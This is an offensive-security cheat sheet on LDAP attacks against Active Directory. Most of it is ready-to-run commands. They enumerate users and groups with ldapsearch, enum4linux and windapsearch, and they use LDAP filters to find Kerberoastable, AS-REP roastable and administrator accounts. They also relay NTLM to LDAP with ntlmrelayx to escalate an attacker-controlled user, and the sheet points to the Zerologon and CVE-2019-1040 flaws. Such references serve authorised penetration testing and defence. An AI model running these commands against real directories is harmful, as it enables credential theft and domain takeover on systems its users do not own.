High Severity | T1078
📂 LDAP Attack Techniques
🧠 Description
LDAP (Lightweight Directory Access Protocol) is used for accessing directory services in Active Directory environments. LDAP attacks target authentication, enumeration, and credential-based attacks against the directory service.
🔍 LDAP Enumeration
# LDAP enumeration with ldapsearch ldapsearch -x -h target.com -D "CN=user,DC=domain,DC=com" -w password -b "DC=domain,DC=com" # Anonymous bind enumeration ldapsearch -x -h target.com -b "DC=domain,DC=com" | grep -i "namingcontexts" # enum4linux for AD enumeration enum4linux -a target.com # windapsearch for comprehensive enum python3 windapsearch.py --dc target.com -u user -p password --enum-users python3 windapsearch.py --dc target.com -u user -p password --enum-groups
💣 LDAP Queries
# Find users with SPN (Kerberoastable) ldapsearch -x -h target.com -D "CN=user,DC=domain,DC=com" -w pass \ -b "DC=domain,DC=com" "(servicePrincipalName=*)" | grep dn # Find admin accounts ldapsearch -x -h target.com -b "DC=domain,DC=com" \ "(&(objectClass=user)(memberOf=CN=Administrators,CN=Users,DC=domain,DC=com))" # Find users with preauth not required (AS-REP roastable) ldapsearch -x -h target.com -b "DC=domain,DC=com" \ "(userAccountControl:1.2.840.113556.1.4.803:=4194304)"
🔄 LDAP Relay
# ntlmrelayx for LDAP relay python3 ntlmrelayx.py -t ldap://dc01.domain.com # LDAP signing required, but can exploit via: # - CVE-2019-1040 (NTLM relay with signing bypass) # - CVE-2020-1472 (Zerologon) - gain DC access # Impacket LDAP relay python3 ntlmrelayx.py -t ldap://target.com --escalate-user attacker